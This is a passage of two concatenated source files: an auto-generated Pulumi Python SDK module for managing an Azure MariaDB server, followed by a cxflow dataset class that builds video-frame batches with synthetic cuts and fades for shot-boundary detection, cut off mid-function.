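Deprecated: this has been moved to the boolean attribute `ssl_enforcement_enabled` and will be removed in version 3.0 of the provider.
"""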
return pulumi.get(self, "ssl_enforcement")
@ssl_enforcement.setter
def ssl_enforcement(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ssl_enforcement", value)
@property
@pulumi.getter(name="sslEnforcementEnabled")
def ssl_enforcement_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies if SSL should be enforced on connections. Possible values are `true` and `false`.
"""
return pulumi.get(self, "ssl_enforcement_enabled")
@ssl_enforcement_enabled.setter
def ssl_enforcement_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "ssl_enforcement_enabled", value)
@property
@pulumi.getter(name="storageMb")
def storage_mb(self) -> Optional[pulumi.Input[int]]:
"""
Max storage allowed for a server. Possible values are between `5120` MB (5 GB) and `1024000` MB (1 TB) for the Basic SKU, and between `5120` MB (5 GB) and `4096000` MB (4 TB) for General Purpose/Memory Optimized SKUs. For more information, see the [product documentation](https://docs.microsoft.com/en-us/rest/api/mariadb/servers/create#storageprofile).
"""
return pulumi.get(self, "storage_mb")
@storage_mb.setter
def storage_mb(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "storage_mb", value)
@property
@pulumi.getter(name="storageProfile")
def storage_profile(self) -> Optional[pulumi.Input['ServerStorageProfileArgs']]:
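"""
Deprecated: all storage_profile properties have been moved to the top level. This block will be removed in version 3.0 of the provider.
"""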
return pulumi.get(self, "storage_profile")
@storage_profile.setter
def storage_profile(self, value: Optional[pulumi.Input['ServerStorageProfileArgs']]):
pulumi.set(self, "storage_profile", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter
def version(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the version of MariaDB to use. Possible values are `10.2` and `10.3`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "version")
@version.setter
def version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "version", value)
class Server(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
administrator_login: Optional[pulumi.Input[str]] = None,
administrator_login_password: Optional[pulumi.Input[str]] = None,
auto_grow_enabled: Optional[pulumi.Input[bool]] = None,
backup_retention_days: Optional[pulumi.Input[int]] = None,
create_mode: Optional[pulumi.Input[str]] = None,
creation_source_server_id: Optional[pulumi.Input[str]] = None,
geo_redundant_backup_enabled: Optional[pulumi.Input[bool]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
public_network_access_enabled: Optional[pulumi.Input[bool]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
restore_point_in_time: Optional[pulumi.Input[str]] = None,
sku_name: Optional[pulumi.Input[str]] = None,
ssl_enforcement: Optional[pulumi.Input[str]] = None,
ssl_enforcement_enabled: Optional[pulumi.Input[bool]] = None,
storage_mb: Optional[pulumi.Input[int]] = None,
storage_profile: Optional[pulumi.Input[pulumi.InputType['ServerStorageProfileArgs']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
version: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages a MariaDB Server.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_server = azure.mariadb.Server("exampleServer",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
administrator_login="mariadbadmin",
administrator_login_password="H@Sh1CoR3!",
sku_name="B_Gen5_2",
storage_mb=5120,
version="10.2",
auto_grow_enabled=True,
backup_retention_days=7,
geo_redundant_backup_enabled=False,
public_network_access_enabled=False,
ssl_enforcement_enabled=True)
```
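A replica of an existing server can also be created via `create_mode` (a minimal sketch reusing the resources above; the SKU and version for a replica are assumed here to match the source server, which this documentation does not confirm):
```python
example_replica = azure.mariadb.Server("exampleReplica",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
sku_name="B_Gen5_2",
version="10.2",
create_mode="Replica",
creation_source_server_id=example_server.id,
ssl_enforcement_enabled=True)
```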
## Import
MariaDB Servers can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:mariadb/server:Server server1 /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/mygroup1/providers/Microsoft.DBforMariaDB/servers/server1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] administrator_login: The Administrator Login for the MariaDB Server. Changing this forces a new resource to be created.
:param pulumi.Input[str] administrator_login_password: The Password associated with the `administrator_login` for the MariaDB Server.
:param pulumi.Input[bool] auto_grow_enabled: Enable/Disable auto-growing of the storage. Storage auto-grow prevents your server from running out of storage and becoming read-only. If storage auto-grow is enabled, the storage grows automatically without impacting the workload. Defaults to `true` if not explicitly specified.
:param pulumi.Input[int] backup_retention_days: Backup retention days for the server, supported values are between `7` and `35` days.
:param pulumi.Input[str] create_mode: The creation mode. Can be used to restore or replicate existing servers. Possible values are `Default`, `Replica`, `GeoRestore`, and `PointInTimeRestore`. Defaults to `Default`.
:param pulumi.Input[str] creation_source_server_id: For creation modes other than `Default`, the source server ID to use.
:param pulumi.Input[bool] geo_redundant_backup_enabled: Turn Geo-redundant server backups on/off. This allows you to choose between locally redundant or geo-redundant backup storage in the General Purpose and Memory Optimized tiers. When the backups are stored in geo-redundant backup storage, they are not only stored within the region in which your server is hosted, but are also replicated to a paired data center. This provides better protection and the ability to restore your server in a different region in the event of a disaster. This is not supported for the Basic tier.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the MariaDB Server. Changing this forces a new resource to be created.
:param pulumi.Input[bool] public_network_access_enabled: Whether or not public network access is allowed for this server. Defaults to `true`.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the MariaDB Server. Changing this forces a new resource to be created.
:param pulumi.Input[str] restore_point_in_time: When `create_mode` is `PointInTimeRestore`, specifies the point in time to restore from `creation_source_server_id`.
:param pulumi.Input[str] sku_name: Specifies the SKU Name for this MariaDB Server. The name of the SKU follows the `tier` + `family` + `cores` pattern (e.g. `B_Gen4_1`, `GP_Gen5_8`). For more information, see the [product documentation](https://docs.microsoft.com/en-us/rest/api/mariadb/servers/create#sku).
:param pulumi.Input[bool] ssl_enforcement_enabled: Specifies if SSL should be enforced on connections. Possible values are `true` and `false`.
:param pulumi.Input[int] storage_mb: Max storage allowed for a server. Possible values are between `5120` MB (5 GB) and `1024000` MB (1 TB) for the Basic SKU, and between `5120` MB (5 GB) and `4096000` MB (4 TB) for General Purpose/Memory Optimized SKUs. For more information, see the [product documentation](https://docs.microsoft.com/en-us/rest/api/mariadb/servers/create#storageprofile).
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
:param pulumi.Input[str] version: Specifies the version of MariaDB to use. Possible values are `10.2` and `10.3`. Changing this forces a new resource to be created.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ServerArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a MariaDB Server.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_server = azure.mariadb.Server("exampleServer",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
administrator_login="mariadbadmin",
administrator_login_password="H@Sh1CoR3!",
sku_name="B_Gen5_2",
storage_mb=5120,
version="10.2",
auto_grow_enabled=True,
backup_retention_days=7,
geo_redundant_backup_enabled=False,
public_network_access_enabled=False,
ssl_enforcement_enabled=True)
```
## Import
MariaDB Servers can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:mariadb/server:Server server1 /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/mygroup1/providers/Microsoft.DBforMariaDB/servers/server1
```
:param str resource_name: The name of the resource.
:param ServerArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ServerArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
administrator_login: Optional[pulumi.Input[str]] = None,
administrator_login_password: Optional[pulumi.Input[str]] = None,
auto_grow_enabled: Optional[pulumi.Input[bool]] = None,
backup_retention_days: Optional[pulumi.Input[int]] = None,
create_mode: Optional[pulumi.Input[str]] = None,
creation_source_server_id: Optional[pulumi.Input[str]] = None,
geo_redundant_backup_enabled: Optional[pulumi.Input[bool]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
public_network_access_enabled: Optional[pulumi.Input[bool]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
restore_point_in_time: Optional[pulumi.Input[str]] = None,
sku_name: Optional[pulumi.Input[str]] = None,
ssl_enforcement: Optional[pulumi.Input[str]] = None,
ssl_enforcement_enabled: Optional[pulumi.Input[bool]] = None,
storage_mb: Optional[pulumi.Input[int]] = None,
storage_profile: Optional[pulumi.Input[pulumi.InputType['ServerStorageProfileArgs']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
version: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ServerArgs.__new__(ServerArgs)
__props__.__dict__["administrator_login"] = administrator_login
__props__.__dict__["administrator_login_password"] = administrator_login_password
__props__.__dict__["auto_grow_enabled"] = auto_grow_enabled
__props__.__dict__["backup_retention_days"] = backup_retention_days
__props__.__dict__["create_mode"] = create_mode
__props__.__dict__["creation_source_server_id"] = creation_source_server_id
__props__.__dict__["geo_redundant_backup_enabled"] = geo_redundant_backup_enabled
__props__.__dict__["location"] = location
__props__.__dict__["name"] = name
__props__.__dict__["public_network_access_enabled"] = public_network_access_enabled
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["restore_point_in_time"] = restore_point_in_time
if sku_name is None and not opts.urn:
raise TypeError("Missing required property 'sku_name'")
__props__.__dict__["sku_name"] = sku_name
if ssl_enforcement is not None and not opts.urn:
warnings.warn("""this has been moved to the boolean attribute `ssl_enforcement_enabled` and will be removed in version 3.0 of the provider.""", DeprecationWarning)
pulumi.log.warn("""ssl_enforcement is deprecated: this has been moved to the boolean attribute `ssl_enforcement_enabled` and will be removed in version 3.0 of the provider.""")
__props__.__dict__["ssl_enforcement"] = ssl_enforcement
__props__.__dict__["ssl_enforcement_enabled"] = ssl_enforcement_enabled
__props__.__dict__["storage_mb"] = storage_mb
if storage_profile is not None and not opts.urn:
warnings.warn("""all storage_profile properties have been moved to the top level. This block will be removed in version 3.0 of the provider.""", DeprecationWarning)
pulumi.log.warn("""storage_profile is deprecated: all storage_profile properties have been moved to the top level. This block will be removed in version 3.0 of the provider.""")
__props__.__dict__["storage_profile"] = storage_profile
__props__.__dict__["tags"] = tags
if version is None and not opts.urn:
raise TypeError("Missing required property 'version'")
__props__.__dict__["version"] = version
__props__.__dict__["fqdn"] = None
super(Server, __self__).__init__(
'azure:mariadb/server:Server',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
administrator_login: Optional[pulumi.Input[str]] = None,
administrator_login_password: Optional[pulumi.Input[str]] = None,
auto_grow_enabled: Optional[pulumi.Input[bool]] = None,
backup_retention_days: Optional[pulumi.Input[int]] = None,
create_mode: Optional[pulumi.Input[str]] = None,
creation_source_server_id: Optional[pulumi.Input[str]] = None,
fqdn: Optional[pulumi.Input[str]] = None,
geo_redundant_backup_enabled: Optional[pulumi.Input[bool]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
public_network_access_enabled: Optional[pulumi.Input[bool]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
restore_point_in_time: Optional[pulumi.Input[str]] = None,
sku_name: Optional[pulumi.Input[str]] = None,
ssl_enforcement: Optional[pulumi.Input[str]] = None,
ssl_enforcement_enabled: Optional[pulumi.Input[bool]] = None,
storage_mb: Optional[pulumi.Input[int]] = None,
storage_profile: Optional[pulumi.Input[pulumi.InputType['ServerStorageProfileArgs']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
version: Optional[pulumi.Input[str]] = None) -> 'Server':
"""
Get an existing Server resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
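For example (a minimal sketch; the resource ID below is the same placeholder used in the import example above):
```python
import pulumi
import pulumi_azure as azure
server = azure.mariadb.Server.get("existingServer",
"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/mygroup1/providers/Microsoft.DBforMariaDB/servers/server1")
pulumi.export("serverFqdn", server.fqdn)
```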
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] administrator_login: The Administrator Login for the MariaDB Server. Changing this forces a new resource to be created.
:param pulumi.Input[str] administrator_login_password: The Password associated with the `administrator_login` for the MariaDB Server.
:param pulumi.Input[bool] auto_grow_enabled: Enable/Disable auto-growing of the storage. Storage auto-grow prevents your server from running out of storage and becoming read-only. If storage auto-grow is enabled, the storage grows automatically without impacting the workload. Defaults to `true` if not explicitly specified.
:param pulumi.Input[int] backup_retention_days: Backup retention days for the server, supported values are between `7` and `35` days.
:param pulumi.Input[str] create_mode: The creation mode. Can be used to restore or replicate existing servers. Possible values are `Default`, `Replica`, `GeoRestore`, and `PointInTimeRestore`. Defaults to `Default`.
:param pulumi.Input[str] creation_source_server_id: For creation modes other than `Default`, the source server ID to use.
:param pulumi.Input[str] fqdn: The FQDN of the MariaDB Server.
:param pulumi.Input[bool] geo_redundant_backup_enabled: Turn Geo-redundant server backups on/off. This allows you to choose between locally redundant or geo-redundant backup storage in the General Purpose and Memory Optimized tiers. When the backups are stored in geo-redundant backup storage, they are not only stored within the region in which your server is hosted, but are also replicated to a paired data center. This provides better protection and the ability to restore your server in a different region in the event of a disaster. This is not supported for the Basic tier.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the MariaDB Server. Changing this forces a new resource to be created.
:param pulumi.Input[bool] public_network_access_enabled: Whether or not public network access is allowed for this server. Defaults to `true`.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the MariaDB Server. Changing this forces a new resource to be created.
:param pulumi.Input[str] restore_point_in_time: When `create_mode` is `PointInTimeRestore`, specifies the point in time to restore from `creation_source_server_id`.
:param pulumi.Input[str] sku_name: Specifies the SKU Name for this MariaDB Server. The name of the SKU follows the `tier` + `family` + `cores` pattern (e.g. `B_Gen4_1`, `GP_Gen5_8`). For more information, see the [product documentation](https://docs.microsoft.com/en-us/rest/api/mariadb/servers/create#sku).
:param pulumi.Input[bool] ssl_enforcement_enabled: Specifies if SSL should be enforced on connections. Possible values are `true` and `false`.
:param pulumi.Input[int] storage_mb: Max storage allowed for a server. Possible values are between `5120` MB (5 GB) and `1024000` MB (1 TB) for the Basic SKU, and between `5120` MB (5 GB) and `4096000` MB (4 TB) for General Purpose/Memory Optimized SKUs. For more information, see the [product documentation](https://docs.microsoft.com/en-us/rest/api/mariadb/servers/create#storageprofile).
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
:param pulumi.Input[str] version: Specifies the version of MariaDB to use. Possible values are `10.2` and `10.3`. Changing this forces a new resource to be created.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ServerState.__new__(_ServerState)
__props__.__dict__["administrator_login"] = administrator_login
__props__.__dict__["administrator_login_password"] = administrator_login_password
__props__.__dict__["auto_grow_enabled"] = auto_grow_enabled
__props__.__dict__["backup_retention_days"] = backup_retention_days
__props__.__dict__["create_mode"] = create_mode
__props__.__dict__["creation_source_server_id"] = creation_source_server_id
__props__.__dict__["fqdn"] = fqdn
__props__.__dict__["geo_redundant_backup_enabled"] = geo_redundant_backup_enabled
__props__.__dict__["location"] = location
__props__.__dict__["name"] = name
__props__.__dict__["public_network_access_enabled"] = public_network_access_enabled
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["restore_point_in_time"] = restore_point_in_time
__props__.__dict__["sku_name"] = sku_name
__props__.__dict__["ssl_enforcement"] = ssl_enforcement
__props__.__dict__["ssl_enforcement_enabled"] = ssl_enforcement_enabled
__props__.__dict__["storage_mb"] = storage_mb
__props__.__dict__["storage_profile"] = storage_profile
__props__.__dict__["tags"] = tags
__props__.__dict__["version"] = version
return Server(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="administratorLogin")
def administrator_login(self) -> pulumi.Output[str]:
"""
The Administrator Login for the MariaDB Server. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "administrator_login")
@property
@pulumi.getter(name="administratorLoginPassword")
def administrator_login_password(self) -> pulumi.Output[Optional[str]]:
"""
The Password associated with the `administrator_login` for the MariaDB Server.
"""
return pulumi.get(self, "administrator_login_password")
@property
@pulumi.getter(name="autoGrowEnabled")
def auto_grow_enabled(self) -> pulumi.Output[bool]:
"""
Enable/Disable auto-growing of the storage. Storage auto-grow prevents your server from running out of storage and becoming read-only. If storage auto-grow is enabled, the storage grows automatically without impacting the workload. Defaults to `true` if not explicitly specified.
"""
return pulumi.get(self, "auto_grow_enabled")
@property
@pulumi.getter(name="backupRetentionDays")
def backup_retention_days(self) -> pulumi.Output[int]:
"""
Backup retention days for the server, supported values are between `7` and `35` days.
"""
return pulumi.get(self, "backup_retention_days")
@property
@pulumi.getter(name="createMode")
def create_mode(self) -> pulumi.Output[Optional[str]]:
"""
The creation mode. Can be used to restore or replicate existing servers. Possible values are `Default`, `Replica`, `GeoRestore`, and `PointInTimeRestore`. Defaults to `Default`.
"""
return pulumi.get(self, "create_mode")
@property
@pulumi.getter(name="creationSourceServerId")
def creation_source_server_id(self) -> pulumi.Output[Optional[str]]:
"""
For creation modes other than `Default`, the source server ID to use.
"""
return pulumi.get(self, "creation_source_server_id")
@property
@pulumi.getter
def fqdn(self) -> pulumi.Output[str]:
"""
The FQDN of the MariaDB Server.
"""
return pulumi.get(self, "fqdn")
@property
@pulumi.getter(name="geoRedundantBackupEnabled")
def geo_redundant_backup_enabled(self) -> pulumi.Output[bool]:
"""
Turn Geo-redundant server backups on/off. This allows you to choose between locally redundant or geo-redundant backup storage in the General Purpose and Memory Optimized tiers. When the backups are stored in geo-redundant backup storage, they are not only stored within the region in which your server is hosted, but are also replicated to a paired data center. This provides better protection and the ability to restore your server in a different region in the event of a disaster. This is not supported for the Basic tier.
"""
return pulumi.get(self, "geo_redundant_backup_enabled")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Specifies the name of the MariaDB Server. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="publicNetworkAccessEnabled")
def public_network_access_enabled(self) -> pulumi.Output[Optional[bool]]:
"""
Whether or not public network access is allowed for this server. Defaults to `true`.
"""
return pulumi.get(self, "public_network_access_enabled")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the resource group in which to create the MariaDB Server. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter(name="restorePointInTime")
def restore_point_in_time(self) -> pulumi.Output[Optional[str]]:
"""
When `create_mode` is `PointInTimeRestore`, specifies the point in time to restore from `creation_source_server_id`.
"""
return pulumi.get(self, "restore_point_in_time")
@property
@pulumi.getter(name="skuName")
def sku_name(self) -> pulumi.Output[str]:
"""
Specifies the SKU Name for this MariaDB Server. The name of the SKU follows the `tier` + `family` + `cores` pattern (e.g. `B_Gen4_1`, `GP_Gen5_8`). For more information, see the [product documentation](https://docs.microsoft.com/en-us/rest/api/mariadb/servers/create#sku).
"""
return pulumi.get(self, "sku_name")
@property
@pulumi.getter(name="sslEnforcement")
def ssl_enforcement(self) -> pulumi.Output[str]:
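"""
Deprecated: this has been moved to the boolean attribute `ssl_enforcement_enabled` and will be removed in version 3.0 of the provider.
"""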
return pulumi.get(self, "ssl_enforcement")
@property
@pulumi.getter(name="sslEnforcementEnabled")
def ssl_enforcement_enabled(self) -> pulumi.Output[Optional[bool]]:
"""
Specifies if SSL should be enforced on connections. Possible values are `true` and `false`.
"""
return pulumi.get(self, "ssl_enforcement_enabled")
@property
@pulumi.getter(name="storageMb")
def storage_mb(self) -> pulumi.Output[int]:
"""
Max storage allowed for a server. Possible values are between `5120` MB (5 GB) and `1024000` MB (1 TB) for the Basic SKU, and between `5120` MB (5 GB) and `4096000` MB (4 TB) for General Purpose/Memory Optimized SKUs. For more information, see the [product documentation](https://docs.microsoft.com/en-us/rest/api/mariadb/servers/create#storageprofile).
"""
return pulumi.get(self, "storage_mb")
@property
@pulumi.getter(name="storageProfile")
def storage_profile(self) -> pulumi.Output['outputs.ServerStorageProfile']:
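"""
Deprecated: all storage_profile properties have been moved to the top level. This block will be removed in version 3.0 of the provider.
"""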
return pulumi.get(self, "storage_profile")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def version(self) -> pulumi.Output[str]:
"""
Specifies the version of MariaDB to use. Possible values are `10.2` and `10.3`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "version")
# === datasets/shots.py (moravecj/ShotsInVideo @ 4ba8a24b172b918766bce6b66d920c39efe32817, MIT license) ===
import logging
import os
import numpy as np
import cxflow as cx
import cv2
import random
import copy
import time
class ShotsDataset(cx.BaseDataset):
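"""Streams sliding-window batches of video frames with per-frame labels (1 = shot-transition frame, 0 = in-shot frame), synthesizing cuts and fades between randomly drawn shots."""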
def __new_shot(self, pom_labels, train):
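# Draw a random video from the requested split and pop a random shot from it,
# clamped to a random length between 10 and _max_shot_length frames; a video
# with no shots left is removed from the split.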
if train:
index = random.randint(0, len(self._train) - 1)
x = self._train[index]
else:
index = random.randint(0, len(self._test) - 1)
x = self._test[index]
s = random.randint(0, len(pom_labels[x]) - 1)
shot = pom_labels[x][s]
leng = random.randint(10, self._max_shot_length)
if shot[1] - shot[0] > leng:
shot[0] = random.randint(shot[0], shot[1] - leng)
shot[1] = shot[0] + min(shot[1] - shot[0], leng)
pom_labels[x].pop(s)
if len(pom_labels[x]) == 0:
if train:
self._train = np.delete(self._train, index)
else:
self._test = np.delete(self._test, index)
return shot, x, pom_labels
def __number_of_shots_left(self, lbls) -> int:
count = 0
for i in self._train:
count += len(lbls[i])
return count
def __fill_vectors_from_frame(self, beg):
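# Slide the window: carry the last `_frames_remember` frames and labels of the
# previously filled batch row into the start of row `beg`, so only the remaining
# `_num_of_frames - _frames_remember` frames still need to be appended.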
ind = self._frames_remember
self._images[beg, 0:ind, :, :, :] = \
self._images[self._frame - 1, (self._num_of_frames - ind):, :, :, :]
self._labels[beg, 0:ind] = \
self._labels[self._frame - 1, (self._num_of_frames - ind):]
self._frames_needed = self._num_of_frames - ind
def __fill_vectors_from_frame_without_labels(self, beg):
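# Same sliding-window carry-over as above, but without copying labels.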
ind = self._frames_remember
self._images[beg, 0:ind, :, :, :] = \
self._images[self._frame - 1, (self._num_of_frames - ind):, :, :, :]
self._frames_needed = self._num_of_frames - ind
def __add_image_and_label_to_batch(self, img, lab) -> bool:
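# Normalize the frame to [0, 1] and append it (with its label) to the current
# batch row; returns True exactly when a full batch is ready to be yielded.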
img = np.array(img, dtype=np.float32)
img /= 255
#if lab == 0 and random.random() < 0.1:
# img = img + random.uniform(0, 0.3)
if self._frame == self._batch_size:
self.__fill_vectors_from_frame(0)
self._frame = 0
if self._frames_needed > 1:
self._images[self._frame, self._num_of_frames - self._frames_needed, :, :, :] = img
self._labels[self._frame, self._num_of_frames - self._frames_needed] = lab
self._frames_needed -= 1
elif self._frames_needed == 1:
self._images[self._frame, self._num_of_frames - self._frames_needed, :, :, :] = img
self._labels[self._frame, self._num_of_frames - self._frames_needed] = lab
self._frames_needed -= 1
self._frame += 1
if self._frame == self._batch_size:
return True
else:
self.__fill_vectors_from_frame(self._frame)
return False
def __add_image_only(self, img) -> bool:
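# Label-free variant of __add_image_and_label_to_batch, e.g. for prediction streams.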
img = np.array(img, dtype=np.float32)
img /= 255
if self._frame == self._batch_size:
self.__fill_vectors_from_frame_without_labels(0)
self._frame = 0
if self._frames_needed > 1:
self._images[self._frame, self._num_of_frames - self._frames_needed, :, :, :] = img
self._frames_needed -= 1
elif self._frames_needed == 1:
self._images[self._frame, self._num_of_frames - self._frames_needed, :, :, :] = img
self._frames_needed -= 1
self._frame += 1
if self._frame == self._batch_size:
return True
else:
self.__fill_vectors_from_frame_without_labels(self._frame)
return False
def __read_labels(self) -> None:
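# Parse the per-video label files into lists of [first_frame, last_frame] shot
# ranges and accumulate the total frame count reported by OpenCV.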
idx = 0
for fn in os.listdir(os.path.join(self._data_root, 'labels')):
x = []
start = 1
with open(os.path.join(self._data_root, 'labels', fn)) as f:
for line in f:
curr = int(line) + 1
if curr != start:
x.append([start - 1, curr - 2])
start = curr + 1
cap = cv2.VideoCapture(self._videos_dir[idx])
fc = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
cap.release()
self._count = self._count + fc - 1
if len(x) > 0:
x.append([start - 2, fc - 1])
else:
x.append([start - 1, fc - 1])
self._labels_dir.append(x)
idx = idx + 1
def _configure_dataset(self, data_root='Dataset', batch_size: int = 50, num_of_frames: int = 100,
length_of_fadein: int = 10, size_of_pictures: int = 32, **kwargs) -> None:
self._batch_size = batch_size
self._data_root = data_root
self._videos_dir = [f.path for f in os.scandir(os.path.join(data_root, 'TRECVidSubset100')) if f.is_file()]
self._labels_dir = []
self._count = 0
self.__read_labels()
self._num_of_frames = num_of_frames
self._frame = 0
self._size_of_pictures = size_of_pictures
self._images = np.zeros((self._batch_size, self._num_of_frames, self._size_of_pictures, self._size_of_pictures, 3), dtype=np.float32)
self._labels = np.zeros((self._batch_size, self._num_of_frames), dtype=np.int64)
self._count_in_batch = self._batch_size * self._num_of_frames
self._length_of_fadein = length_of_fadein
self._perm = np.random.permutation(len(self._labels_dir))
self._max_shot_length = 30
self._black_frame = np.zeros((self._size_of_pictures, self._size_of_pictures, 3), dtype=np.uint8)
self._frames_needed = self._num_of_frames
self._frames_remember = self._num_of_frames - 1
self._dat_index = 0
def train_stream(self) -> cx.Stream:
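# Yields training batches from the first 85 videos of the permutation,
# synthesizing a transition at each shot boundary: a fade-in from black when
# choice < 0.75, otherwise a fade-out to black (the trailing cross-fade branch
# is unreachable with the guards as written); transition frames are labeled 1.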
#self._frame = -self._num_of_frames
self._frame = 0
self._frames_needed = self._num_of_frames
self._train = self._perm[:85]
pom_labels = copy.deepcopy(self._labels_dir)
index = random.randint(0, len(self._train) - 1)
x = self._train[index]
s = random.randint(0, len(pom_labels[x]) - 1)
shot = pom_labels[x][s]
leng = random.randint(10, self._max_shot_length)
if shot[1] - shot[0] > leng:
shot[0] = random.randint(shot[0], shot[1] - leng)
shot[1] = shot[0] + min(shot[1] - shot[0], leng)
pom_labels[x].pop(s)
if len(pom_labels[x]) == 0:
self._train = np.delete(self._train, index)
cap = cv2.VideoCapture(self._videos_dir[x])
idx = 0
i = 0
while True:
i = i + 1
if shot[0] + idx < shot[1]:
cap.set(cv2.CAP_PROP_POS_FRAMES, shot[0] + idx)
ret, buf = cap.read()
buf = cv2.resize(buf, (self._size_of_pictures, self._size_of_pictures))
if self.__add_image_and_label_to_batch(buf, 0):
yield {'images': self._images, 'labels': self._labels}
idx = idx + 1
elif shot[0] + idx == shot[1]:
cap.set(cv2.CAP_PROP_POS_FRAMES, shot[0] + idx)
ret, fr1 = cap.read()
fr1 = cv2.resize(fr1, (self._size_of_pictures, self._size_of_pictures))
choice = random.random()
if choice >= 0.5:
if self.__add_image_and_label_to_batch(fr1, 1):
yield {'images': self._images, 'labels': self._labels}
idx = idx + 1
if choice < 0.75:
if len(self._train) == 0:
break
shot, x, pom_labels = self.__new_shot(pom_labels, True)
idx = 0
cap.release()
cap = cv2.VideoCapture(self._videos_dir[x])
cap.set(1, shot[0] + idx)
ret, fr2 = cap.read()
fr2 = cv2.resize(fr2, (self._size_of_pictures, self._size_of_pictures))
length_of_fadein = random.randint(10, self._length_of_fadein)
for IN in range(0, length_of_fadein):
fadein = IN / float(length_of_fadein)
dst = cv2.addWeighted(self._black_frame, 1 - fadein, fr2, fadein, 0)
dst = cv2.resize(dst, (self._size_of_pictures, self._size_of_pictures))
if self.__add_image_and_label_to_batch(dst, 1):
yield {'images': self._images, 'labels': self._labels}
elif choice >= 0.25:
